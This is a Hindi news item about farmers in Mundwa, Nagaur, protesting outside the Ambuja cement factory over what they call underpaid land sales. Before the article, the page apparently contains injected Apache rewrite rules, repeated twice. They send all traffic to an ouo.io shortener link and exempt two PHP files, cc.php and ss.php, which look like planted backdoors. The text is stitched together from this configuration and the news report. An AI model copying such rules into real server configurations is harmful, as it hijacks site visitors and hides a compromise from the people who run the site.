
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 353
Previous Nextनागौर। नागौर जिले के मूंडवा गांव स्थित अंबुजा सीमेंट फैक्ट्री के मुख्य गेट बाहर शनिवार को किसान धरने पर बैठ गए। किसानों ने फैक्ट्री प्रबंधन के खिलाफ नारेबाजी कर प्रदर्शन किया। किसानों का आरोप है कि फैक्ट्री के प्रतिनिधियों और सरकारी अधिकारियों की मिलीभगत के चलते फैक्ट्री को बेची गई जमीन का उचित दाम उन्हें नहीं मिला। धरना-प्रदर्शन कर रहे किसान लक्ष्मीनारायण मूंडेल ने कहा कि अंबुजा ने रीको व प्रशासन के माध्यम से दबाव किसानों से 1200 बीघा जमीन कोड़ियों के भाव में खरीदी है। इसके बाद किसानों की 596 बीघा जमीन और ली गई। इस जमीन के लिए किसानों को मात्र दो-दो लाख रुपए दिए गए। किसानों ने कहा कि उस समय ये तय हुआ था कि जमीन की राशि का भुगतान नई डीएलएसी दरों के अनुरूप होगा. लेकिन उस बात पर अभी तक अमल नहीं किया गया। फैक्ट्री प्रबंधन जब तक किसानों की नई डीएलसी दरों से अनुरूप पैसे नहीं देता तब तक धरना जारी रहेगा।